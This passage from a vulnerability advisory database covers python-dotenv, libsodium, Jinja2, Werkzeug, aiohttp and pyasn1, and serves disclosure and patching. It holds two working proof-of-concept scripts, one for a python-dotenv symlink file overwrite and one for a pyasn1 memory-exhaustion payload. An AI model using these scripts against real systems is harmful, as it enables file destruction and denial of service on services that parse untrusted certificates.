],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-28684"
],
"database_specific": {
"cwe_ids": [
"CWE-59",
"CWE-61"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-21T14:38:57Z",
"nvd_published_at": "2026-04-20T17:16:33Z",
"severity": "MODERATE"
},
"details": "### Summary\n\n`set_key()` and `unset_key()` in python-dotenv follow symbolic links when rewriting `.env` files, allowing a local attacker to overwrite arbitrary files via a crafted symlink when a cross-device rename fallback is triggered.\n\n\n### Details\n\nThe `rewrite()` context manager in `dotenv/main.py` is used by both `set_key()` and `unset_key()` to safely modify `.env` files. It works by writing to a temporary file (created in the system\u0027s default temp directory, typically `/tmp`) and then using `shutil.move()` to replace the original file.\n\nWhen the `.env` path is a symbolic link and the temp directory resides on a different filesystem than the target (a common configuration on Linux systems using tmpfs for `/tmp`), the following sequence occurs:\n\n1. `shutil.move()` first attempts `os.rename()`, which fails with an `OSError` because atomic renames cannot cross device boundaries.\n2. On failure, `shutil.move()` falls back to `shutil.copy2()` followed by `os.unlink()`.\n3. `shutil.copy2()` calls `shutil.copyfile()` with `follow_symlinks=True` by default.\n4. This causes the content to be written to the **symlink target** rather than replacing the symlink itself.\n\nAn attacker who has write access to the directory containing a `.env` file can pre-place a symlink pointing to any file that the application process has write access to. When the application (or a privileged process such as a deploy script, Docker entrypoint, or CI pipeline) calls `set_key()` or `unset_key()`, the symlink target is overwritten with the new `.env` content.\n\nThis vulnerability does not require a race condition and is fully deterministic once the preconditions are met.\n\n### Impact\nThe primary impacts are to **integrity** and **availability**:\n\n- **File overwrite / destruction (DoS):** An attacker can cause an application or privileged process to corrupt or destroy configuration files, database configs, or other sensitive files it would not normally have access to modify.\n- **Integrity violation:** The target file\u0027s original content is replaced with `.env`-formatted content controlled by the attacker.\n- **Potential privilege escalation:** In scenarios where a privileged process (running as root or a service account) calls `set_key()`, the attacker can leverage this to write to files beyond their own access level.\n\nThe scope of impact depends on the application using python-dotenv and the privileges under which it runs.\n\n\n### Proof of Concept\n\nThe following script demonstrates the vulnerability. It requires `/tmp` and the user\u0027s home directory to reside on different devices (common on systemd-based Linux systems with tmpfs).\n\n```python\nimport os\nimport sys\nimport tempfile\nfrom dotenv import set_key\n\n# Pre-condition: /tmp must be on a different device than the target directory.\ntmp_dev = os.stat(\"/tmp\").st_dev\nhome_dev = os.stat(os.path.expanduser(\"~\")).st_dev\nassert tmp_dev != home_dev, \"Skipped: /tmp and ~ are on the same device (no cross-device move)\"\n\nwith tempfile.TemporaryDirectory(dir=os.path.expanduser(\"~\")) as workdir:\n # File an attacker wants to overwrite\n target = os.path.join(workdir, \"victim_config.txt\")\n with open(target, \"w\") as f:\n f.write(\"DB_PASSWORD=supersecret\\n\")\n\n # Attacker pre-places a symlink at the path the application will use as .env\n env_symlink = os.path.join(workdir, \".env\")\n os.symlink(target, env_symlink)\n\n before = open(target).read()\n\n # Application writes a new key -- triggers the cross-device fallback\n set_key(env_symlink, \"INJECTED\", \"attacker_value\")\n\n after = open(target).read()\n\n print(\"Before:\", repr(before))\n print(\"After: \", repr(after))\n print(\"Symlink target overwritten:\", target)\n```\n\n**Expected output:**\n```\nBefore: \u0027DB_PASSWORD=supersecret\\n\u0027\nAfter: \"DB_PASSWORD=supersecret\\nINJECTED=\u0027attacker_value\u0027\\n\"\nSymlink target overwritten: /home/user/tmp806nut2g/victim_config.txt\n```\n\n### Remediation\n\nThe fix changes the `rewrite()` context manager in the following ways:\n\n1. **Symlinks are no longer followed by default.** When the `.env` path is a symlink, `rewrite()` now resolves it to the real path before proceeding, or (by default) operates on the symlink entry itself rather than the target.\n2. **A `follow_symlinks: bool = False` parameter** is added to `set_key()` and `unset_key()` for users who explicitly need the old behavior.\n3. **Temp files are written in the same directory** as the target `.env` file (instead of the system temp directory), eliminating the cross-device rename condition entirely.\n4. **`os.replace()` is used instead of `shutil.move()`**, providing atomic replacement without symlink-following fallback behavior.\n\nUsers are advised to upgrade to the patched version as soon as it is available on PyPI.\n\n### Timeline\n\n| Date | Event |\n| ------------ | ---------------------------------------------------------------------------------------------------- |\n| 2026-01-09 | Initial report received from Giorgos Tsigourakos regarding a separate, unrelated issue also located in `rewrite()` |\n| 2026-01-10 | Co-maintainer acknowledged report, requested clarification |\n| 2026-01-11 | Initial report assessed as not exploitable and closed |\n| 2026-02-24 | Reporter identified new, distinct cross-device symlink attack vector with deterministic exploitation |\n| 2026-02-26 | Co-maintainer confirmed vulnerability and shared draft patch |\n| 2026-02-26 | Reporter validated fix with monkeypatched PoC, proposed CVSS |\n| 2026-03-01 | Patch merged to main |\n| 2026-03-01 | Patched version released to PyPI |\n| 2026-04-20 | Advisory published |\n\n### Patches\n\nUpgrade to v.1.2.2 or use the patch from https://github.com/theskumar/python-dotenv/commit/790c5c02991100aa1bf41ee5330aca75edc51311.patch",
"id": "GHSA-mf9w-mj56-hr94",
"modified": "2026-04-21T14:38:57Z",
"published": "2026-04-21T14:38:57Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/theskumar/python-dotenv/security/advisories/GHSA-mf9w-mj56-hr94"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28684"
},
{
"type": "WEB",
"url": "https://github.com/theskumar/python-dotenv/commit/790c5c02991100aa1bf41ee5330aca75edc51311"
},
{
"type": "WEB",
"url": "https://github.com/theskumar/python-dotenv/commit/790c5c02991100aa1bf41ee5330aca75edc51311.patch"
},
{
"type": "PACKAGE",
"url": "https://github.com/theskumar/python-dotenv"
},
{
"type": "WEB",
"url": "https://github.com/theskumar/python-dotenv/releases/tag/v1.2.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "python-dotenv: Symlink following in set_key allows arbitrary file overwrite via cross-device rename fallback"
}
GHSA-MRFV-M5WM-5W6W
Vulnerability from github – Published: 2025-12-31 06:30 – Updated: 2026-01-07 18:30libsodium before ad3004e, in atypical use cases involving certain custom cryptography or untrusted data to crypto_core_ed25519_is_valid_point, mishandles checks for whether an elliptic curve point is valid because it sometimes allows points that aren't in the main cryptographic group.
This advisoory lists packages in the GitHub Advisory Database's supported ecosystems that are affected by this vulnerability due to a vulnerable dependency.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "paragonie/sodium_compat"
},
"ranges": [
{
"events": [
{
"introduced": "2"
},
{
"fixed": "2.5.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "paragonie/sodium_compat"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.24.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "PyNaCl"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.6.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "hdwallet"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.6.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-69277"
],
"database_specific": {
"cwe_ids": [
"CWE-184"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-06T17:12:24Z",
"nvd_published_at": "2025-12-31T06:15:41Z",
"severity": "MODERATE"
},
"details": "libsodium before ad3004e, in atypical use cases involving certain custom cryptography or untrusted data to crypto_core_ed25519_is_valid_point, mishandles checks for whether an elliptic curve point is valid because it sometimes allows points that aren\u0027t in the main cryptographic group.\n\nThis advisoory lists packages in the GitHub Advisory Database\u0027s [supported ecosystems](https://github.com/github/advisory-database?tab=readme-ov-file#supported-ecosystems) that are affected by this vulnerability due to a vulnerable dependency.",
"id": "GHSA-mrfv-m5wm-5w6w",
"modified": "2026-01-07T18:30:24Z",
"published": "2025-12-31T06:30:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69277"
},
{
"type": "WEB",
"url": "https://github.com/pyca/pynacl/issues/920"
},
{
"type": "WEB",
"url": "https://github.com/hdwallet-io/python-hdwallet/pull/124"
},
{
"type": "WEB",
"url": "https://github.com/jedisct1/libsodium/commit/ad3004ec8731730e93fcfbbc824e67eadc1c1bae"
},
{
"type": "WEB",
"url": "https://github.com/paragonie/sodium_compat/commit/2cb48f26130919f92f30650bdcc30e6f4ebe45ac"
},
{
"type": "WEB",
"url": "https://github.com/paragonie/sodium_compat/commit/4714da6efdc782c06690bc72ce34fae7941c2d9f"
},
{
"type": "WEB",
"url": "https://github.com/pyca/pynacl/commit/96314884d88d1089ff5f336dba61d7abbcddbbf7"
},
{
"type": "WEB",
"url": "https://github.com/pyca/pynacl/commit/ecf41f55a3d8f1e10ce89c61c4b4d67f3f4467cf"
},
{
"type": "WEB",
"url": "https://00f.net/2025/12/30/libsodium-vulnerability"
},
{
"type": "WEB",
"url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/paragonie/sodium_compat/2025-12-30.yaml"
},
{
"type": "PACKAGE",
"url": "https://github.com/paragonie/sodium_compat"
},
{
"type": "WEB",
"url": "https://ianix.com/pub/ed25519-deployment.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2026/01/msg00004.html"
},
{
"type": "WEB",
"url": "https://news.ycombinator.com/item?id=46435614"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "libsodium has Incomplete List of Disallowed Inputs"
}
GHSA-CPWX-VRP4-4PQ7
Vulnerability from github – Published: 2025-03-05 20:40 – Updated: 2025-11-03 22:54An oversight in how the Jinja sandboxed environment interacts with the |attr filter allows an attacker that controls the content of a template to execute arbitrary Python code.
To exploit the vulnerability, an attacker needs to control the content of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications which execute untrusted templates.
Jinja's sandbox does catch calls to str.format and ensures they don't escape the sandbox. However, it's possible to use the |attr filter to get a reference to a string's plain format method, bypassing the sandbox. After the fix, the |attr filter no longer bypasses the environment's attribute lookup.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.1.5"
},
"package": {
"ecosystem": "PyPI",
"name": "Jinja2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-27516"
],
"database_specific": {
"cwe_ids": [
"CWE-1336"
],
"github_reviewed": true,
"github_reviewed_at": "2025-03-05T20:40:14Z",
"nvd_published_at": "2025-03-05T21:15:20Z",
"severity": "MODERATE"
},
"details": "An oversight in how the Jinja sandboxed environment interacts with the `|attr` filter allows an attacker that controls the content of a template to execute arbitrary Python code.\n\nTo exploit the vulnerability, an attacker needs to control the content of a template. Whether that is the case depends on the type of application using Jinja. This vulnerability impacts users of applications which execute untrusted templates.\n\nJinja\u0027s sandbox does catch calls to `str.format` and ensures they don\u0027t escape the sandbox. However, it\u0027s possible to use the `|attr` filter to get a reference to a string\u0027s plain format method, bypassing the sandbox. After the fix, the `|attr` filter no longer bypasses the environment\u0027s attribute lookup.",
"id": "GHSA-cpwx-vrp4-4pq7",
"modified": "2025-11-03T22:54:41Z",
"published": "2025-03-05T20:40:14Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27516"
},
{
"type": "WEB",
"url": "https://github.com/pallets/jinja/commit/90457bbf33b8662926ae65cdde4c4c32e756e403"
},
{
"type": "PACKAGE",
"url": "https://github.com/pallets/jinja"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00022.html"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00045.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Jinja2 vulnerable to sandbox breakout through attr filter selecting format method"
}
GHSA-Q34M-JH98-GWM2
Vulnerability from github – Published: 2024-10-25 19:44 – Updated: 2026-05-20 22:24Applications using Werkzeug to parse multipart/form-data requests are vulnerable to resource exhaustion. A specially crafted form body can bypass the Request.max_form_memory_size setting.
The Request.max_content_length setting, as well as resource limits provided by deployment software and platforms, are also available to limit the resources used during a request. This vulnerability does not affect those settings. All three types of limits should be considered and set appropriately when deploying an application.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.0.5"
},
"package": {
"ecosystem": "PyPI",
"name": "Werkzeug"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0rc1"
},
{
"fixed": "3.0.6"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "Quart"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.20.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-49767"
],
"database_specific": {
"cwe_ids": [
"CWE-400"
],
"github_reviewed": true,
"github_reviewed_at": "2024-10-25T19:44:43Z",
"nvd_published_at": "2024-10-25T20:15:04Z",
"severity": "MODERATE"
},
"details": "Applications using Werkzeug to parse `multipart/form-data` requests are vulnerable to resource exhaustion. A specially crafted form body can bypass the `Request.max_form_memory_size` setting.\n\n\nThe `Request.max_content_length` setting, as well as resource limits provided by deployment software and platforms, are also available to limit the resources used during a request. This vulnerability does not affect those settings. All three types of limits should be considered and set appropriately when deploying an application.",
"id": "GHSA-q34m-jh98-gwm2",
"modified": "2026-05-20T22:24:15Z",
"published": "2024-10-25T19:44:43Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pallets/werkzeug/security/advisories/GHSA-q34m-jh98-gwm2"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-49767"
},
{
"type": "WEB",
"url": "https://github.com/pallets/quart/commit/5e78c4169b8eb66b91ead3e62d44721b9e1644ee"
},
{
"type": "WEB",
"url": "https://github.com/pallets/quart/commit/abb04a512496206de279225340ed022852fbf51f"
},
{
"type": "WEB",
"url": "https://github.com/pallets/werkzeug/commit/50cfeebcb0727e18cc52ffbeb125f4a66551179b"
},
{
"type": "WEB",
"url": "https://github.com/pallets/werkzeug/commit/cbb446fdcada7685fce936ded01b76c08dbd6eb5"
},
{
"type": "PACKAGE",
"url": "https://github.com/pallets/werkzeug"
},
{
"type": "WEB",
"url": "https://github.com/pallets/werkzeug/releases/tag/3.0.6"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20250103-0007"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Werkzeug possible resource exhaustion when parsing file data in forms"
}
GHSA-F9VJ-2WH5-FJ8J
Vulnerability from github – Published: 2024-10-25 19:43 – Updated: 2025-01-31 15:30On Python < 3.11 on Windows, os.path.isabs() does not catch UNC paths like //server/share. Werkzeug's safe_join() relies on this check, and so can produce a path that is not safe, potentially allowing unintended access to data. Applications using Python >= 3.11, or not using Windows, are not vulnerable.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.0.5"
},
"package": {
"ecosystem": "PyPI",
"name": "Werkzeug"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.0.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-49766"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2024-10-25T19:43:41Z",
"nvd_published_at": "2024-10-25T20:15:04Z",
"severity": "MODERATE"
},
"details": "On Python \u003c 3.11 on Windows, `os.path.isabs()` does not catch UNC paths like `//server/share`. Werkzeug\u0027s `safe_join()` relies on this check, and so can produce a path that is not safe, potentially allowing unintended access to data. Applications using Python \u003e= 3.11, or not using Windows, are not vulnerable.",
"id": "GHSA-f9vj-2wh5-fj8j",
"modified": "2025-01-31T15:30:42Z",
"published": "2024-10-25T19:43:41Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pallets/werkzeug/security/advisories/GHSA-f9vj-2wh5-fj8j"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-49766"
},
{
"type": "WEB",
"url": "https://github.com/pallets/werkzeug/commit/2767bcb10a7dd1c297d812cc5e6d11a474c1f092"
},
{
"type": "PACKAGE",
"url": "https://github.com/pallets/werkzeug"
},
{
"type": "WEB",
"url": "https://github.com/pallets/werkzeug/releases/tag/3.0.6"
},
{
"type": "WEB",
"url": "https://security.netapp.com/advisory/ntap-20250131-0005"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Werkzeug safe_join not safe on Windows"
}
GHSA-P998-JP59-783M
Vulnerability from github – Published: 2026-04-01 21:26 – Updated: 2026-04-06 16:47Summary
On Windows the static resource handler may expose information about a NTLMv2 remote path.
Impact
If an application is running on Windows, and using aiohttp's static resource handler (not recommended in production), then it may be possible for an attacker to extract the hash from an NTLMv2 path and then extract the user's credentials from there.
Patch: https://github.com/aio-libs/aiohttp/commit/0ae2aa076c84573df83fc1fdc39eec0f5862fe3d
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.13.3"
},
"package": {
"ecosystem": "PyPI",
"name": "aiohttp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.13.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-34515"
],
"database_specific": {
"cwe_ids": [
"CWE-36",
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-01T21:26:36Z",
"nvd_published_at": "2026-04-01T21:16:59Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nOn Windows the static resource handler may expose information about a NTLMv2 remote path.\n\n### Impact\n\nIf an application is running on Windows, and using aiohttp\u0027s static resource handler (not recommended in production), then it may be possible for an attacker to extract the hash from an NTLMv2 path and then extract the user\u0027s credentials from there.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/0ae2aa076c84573df83fc1fdc39eec0f5862fe3d",
"id": "GHSA-p998-jp59-783m",
"modified": "2026-04-06T16:47:09Z",
"published": "2026-04-01T21:26:36Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-p998-jp59-783m"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34515"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/commit/0ae2aa076c84573df83fc1fdc39eec0f5862fe3d"
},
{
"type": "PACKAGE",
"url": "https://github.com/aio-libs/aiohttp"
},
{
"type": "WEB",
"url": "https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U",
"type": "CVSS_V4"
}
],
"summary": "AIOHTTP affected by UNC SSRF/NTLMv2 Credential Theft/Local File Read in static resource handler on Windows"
}
GHSA-63VM-454H-VHHQ
Vulnerability from github – Published: 2026-01-16 19:19 – Updated: 2026-02-01 18:30Summary
After reviewing pyasn1 v0.6.1 a Denial-of-Service issue has been found that leads to memory exhaustion from malformed RELATIVE-OID with excessive continuation octets.
Details
The integer issue can be found in the decoder as reloid += ((subId << 7) + nextSubId,): https://github.com/pyasn1/pyasn1/blob/main/pyasn1/codec/ber/decoder.py#L496
PoC
For the DoS:
import pyasn1.codec.ber.decoder as decoder
import pyasn1.type.univ as univ
import sys
import resource
# Deliberately set memory limit to display PoC
try:
resource.setrlimit(resource.RLIMIT_AS, (100*1024*1024, 100*1024*1024))
print("[*] Memory limit set to 100MB")
except:
print("[-] Could not set memory limit")
# Test with different payload sizes to find the DoS threshold
payload_size_mb = int(sys.argv[1])
print(f"[*] Testing with {payload_size_mb}MB payload...")
payload_size = payload_size_mb * 1024 * 1024
# Create payload with continuation octets
# Each 0x81 byte indicates continuation, causing bit shifting in decoder
payload = b'\x81' * payload_size + b'\x00'
length = len(payload)
# DER length encoding (supports up to 4GB)
if length < 128:
length_bytes = bytes([length])
elif length < 256:
length_bytes = b'\x81' + length.to_bytes(1, 'big')
elif length < 256**2:
length_bytes = b'\x82' + length.to_bytes(2, 'big')
elif length < 256**3:
length_bytes = b'\x83' + length.to_bytes(3, 'big')
else:
# 4 bytes can handle up to 4GB
length_bytes = b'\x84' + length.to_bytes(4, 'big')
# Use OID (0x06) for more aggressive parsing
malicious_packet = b'\x06' + length_bytes + payload
print(f"[*] Packet size: {len(malicious_packet) / 1024 / 1024:.1f} MB")
try:
print("[*] Decoding (this may take time or exhaust memory)...")
result = decoder.decode(malicious_packet, asn1Spec=univ.ObjectIdentifier())
print(f'[+] Decoded successfully')
print(f'[!] Object size: {sys.getsizeof(result[0])} bytes')
# Try to convert to string
print('[*] Converting to string...')
try:
str_result = str(result[0])
print(f'[+] String succeeded: {len(str_result)} chars')
if len(str_result) > 10000:
print(f'[!] MEMORY EXPLOSION: {len(str_result)} character string!')
except MemoryError:
print(f'[-] MemoryError during string conversion!')
except Exception as e:
print(f'[-] {type(e).__name__} during string conversion')
except MemoryError:
print('[-] MemoryError: Out of memory!')
except Exception as e:
print(f'[-] Error: {type(e).__name__}: {e}')
print("\n[*] Test completed")
Screenshots with the results:
DoS
Leak analysis
A potential heap leak was investigated but came back clean:
[*] Creating 1000KB payload...
[*] Decoding with pyasn1...
[*] Materializing to string...
[+] Decoded 2157784 characters
[+] Binary representation: 896001 bytes
[+] Dumped to heap_dump.bin
[*] First 64 bytes (hex):
01020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081
[*] First 64 bytes (ASCII/hex dump):
0000: 01 02 04 08 10 20 40 81 02 04 08 10 20 40 81 02 ..... @..... @..
0010: 04 08 10 20 40 81 02 04 08 10 20 40 81 02 04 08 ... @..... @....
0020: 10 20 40 81 02 04 08 10 20 40 81 02 04 08 10 20 . @..... @.....
0030: 40 81 02 04 08 10 20 40 81 02 04 08 10 20 40 81 @..... @..... @.
[*] Digit distribution analysis:
'0': 10.1%
'1': 9.9%
'2': 10.0%
'3': 9.9%
'4': 9.9%
'5': 10.0%
'6': 10.0%
'7': 10.0%
'8': 9.9%
'9': 10.1%
Scenario
- An attacker creates a malicious X.509 certificate.
- The application validates certificates.
- The application accepts the malicious certificate and tries decoding resulting in the issues mentioned above.
Impact
This issue can affect resource consumption and hang systems or stop services. This may affect: - LDAP servers - TLS/SSL endpoints - OCSP responders - etc.
Recommendation
Add a limit to the allowed bytes in the decoder.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "pyasn1"
},
"ranges": [
{
"events": [
{
"introduced": "0.6.1"
},
{
"fixed": "0.6.2"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"0.6.1"
]
}
],
"aliases": [
"CVE-2026-23490"
],
"database_specific": {
"cwe_ids": [
"CWE-400",
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-16T19:19:25Z",
"nvd_published_at": "2026-01-16T19:16:19Z",
"severity": "HIGH"
},
"details": "### Summary\n\nAfter reviewing pyasn1 v0.6.1 a Denial-of-Service issue has been found that leads to memory exhaustion from malformed RELATIVE-OID with excessive continuation octets.\n\n### Details\n\nThe integer issue can be found in the decoder as `reloid += ((subId \u003c\u003c 7) + nextSubId,)`: https://github.com/pyasn1/pyasn1/blob/main/pyasn1/codec/ber/decoder.py#L496\n\n### PoC\n\nFor the DoS:\n```py\nimport pyasn1.codec.ber.decoder as decoder\nimport pyasn1.type.univ as univ\nimport sys\nimport resource\n\n# Deliberately set memory limit to display PoC\ntry:\n resource.setrlimit(resource.RLIMIT_AS, (100*1024*1024, 100*1024*1024))\n print(\"[*] Memory limit set to 100MB\")\nexcept:\n print(\"[-] Could not set memory limit\")\n\n# Test with different payload sizes to find the DoS threshold\npayload_size_mb = int(sys.argv[1])\n\nprint(f\"[*] Testing with {payload_size_mb}MB payload...\")\n\npayload_size = payload_size_mb * 1024 * 1024\n# Create payload with continuation octets\n# Each 0x81 byte indicates continuation, causing bit shifting in decoder\npayload = b\u0027\\x81\u0027 * payload_size + b\u0027\\x00\u0027\nlength = len(payload)\n\n# DER length encoding (supports up to 4GB)\nif length \u003c 128:\n length_bytes = bytes([length])\nelif length \u003c 256:\n length_bytes = b\u0027\\x81\u0027 + length.to_bytes(1, \u0027big\u0027)\nelif length \u003c 256**2:\n length_bytes = b\u0027\\x82\u0027 + length.to_bytes(2, \u0027big\u0027)\nelif length \u003c 256**3:\n length_bytes = b\u0027\\x83\u0027 + length.to_bytes(3, \u0027big\u0027)\nelse:\n # 4 bytes can handle up to 4GB\n length_bytes = b\u0027\\x84\u0027 + length.to_bytes(4, \u0027big\u0027)\n\n# Use OID (0x06) for more aggressive parsing\nmalicious_packet = b\u0027\\x06\u0027 + length_bytes + payload\n\nprint(f\"[*] Packet size: {len(malicious_packet) / 1024 / 1024:.1f} MB\")\n\ntry:\n print(\"[*] Decoding (this may take time or exhaust memory)...\")\n result = decoder.decode(malicious_packet, asn1Spec=univ.ObjectIdentifier())\n\n print(f\u0027[+] Decoded successfully\u0027)\n print(f\u0027[!] Object size: {sys.getsizeof(result[0])} bytes\u0027)\n\n # Try to convert to string\n print(\u0027[*] Converting to string...\u0027)\n try:\n str_result = str(result[0])\n print(f\u0027[+] String succeeded: {len(str_result)} chars\u0027)\n if len(str_result) \u003e 10000:\n print(f\u0027[!] MEMORY EXPLOSION: {len(str_result)} character string!\u0027)\n except MemoryError:\n print(f\u0027[-] MemoryError during string conversion!\u0027)\n except Exception as e:\n print(f\u0027[-] {type(e).__name__} during string conversion\u0027)\n\nexcept MemoryError:\n print(\u0027[-] MemoryError: Out of memory!\u0027)\nexcept Exception as e:\n print(f\u0027[-] Error: {type(e).__name__}: {e}\u0027)\n\n\nprint(\"\\n[*] Test completed\")\n```\n\n\nScreenshots with the results:\n\n#### DoS\n\u003cimg width=\"944\" height=\"207\" alt=\"Screenshot_20251219_160840\" src=\"https://github.com/user-attachments/assets/68b9566b-5ee1-47b0-a269-605b037dfc4f\" /\u003e\n\n\u003cimg width=\"931\" height=\"231\" alt=\"Screenshot_20251219_152815\" src=\"https://github.com/user-attachments/assets/62eacf4f-eb31-4fba-b7a8-e8151484a9fa\" /\u003e\n\n#### Leak analysis\n\nA potential heap leak was investigated but came back clean:\n```\n[*] Creating 1000KB payload...\n[*] Decoding with pyasn1...\n[*] Materializing to string...\n[+] Decoded 2157784 characters\n[+] Binary representation: 896001 bytes\n[+] Dumped to heap_dump.bin\n\n[*] First 64 bytes (hex):\n 01020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081020408102040810204081\n\n[*] First 64 bytes (ASCII/hex dump):\n 0000: 01 02 04 08 10 20 40 81 02 04 08 10 20 40 81 02 ..... @..... @..\n 0010: 04 08 10 20 40 81 02 04 08 10 20 40 81 02 04 08 ... @..... @....\n 0020: 10 20 40 81 02 04 08 10 20 40 81 02 04 08 10 20 . @..... @..... \n 0030: 40 81 02 04 08 10 20 40 81 02 04 08 10 20 40 81 @..... @..... @.\n\n[*] Digit distribution analysis:\n \u00270\u0027: 10.1%\n \u00271\u0027: 9.9%\n \u00272\u0027: 10.0%\n \u00273\u0027: 9.9%\n \u00274\u0027: 9.9%\n \u00275\u0027: 10.0%\n \u00276\u0027: 10.0%\n \u00277\u0027: 10.0%\n \u00278\u0027: 9.9%\n \u00279\u0027: 10.1%\n```\n\n### Scenario\n\n1. An attacker creates a malicious X.509 certificate.\n2. The application validates certificates.\n3. The application accepts the malicious certificate and tries decoding resulting in the issues mentioned above.\n\n### Impact\n\nThis issue can affect resource consumption and hang systems or stop services.\nThis may affect:\n- LDAP servers\n- TLS/SSL endpoints\n- OCSP responders\n- etc.\n\n### Recommendation\n\nAdd a limit to the allowed bytes in the decoder.",
"id": "GHSA-63vm-454h-vhhq",
"modified": "2026-02-01T18:30:16Z",
"published": "2026-01-16T19:19:25Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pyasn1/pyasn1/security/advisories/GHSA-63vm-454h-vhhq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23490"
},
{
"type": "WEB",
"url": "https://github.com/pyasn1/pyasn1/commit/3908f144229eed4df24bd569d16e5991ace44970"
},
{
"type": "WEB",
"url": "https://github.com/pyasn1/pyasn1/commit/be353d755f42ea36539b4f5053c652ddf56979a6"
},
{
"type": "PACKAGE",
"url": "https://github.com/pyasn1/pyasn1"
},
{
"type": "WEB",
"url": "https://github.com/pyasn1/pyasn1/blob/0f07d7242a78ab4d129b26256d7474f7168cf536/pyasn1/codec/ber/decoder.py#L496"
},
{
"type": "WEB",
"url": "https://github.com/pyasn1/pyasn1/releases/tag/v0.6.2"
},
{
"type": "WEB",
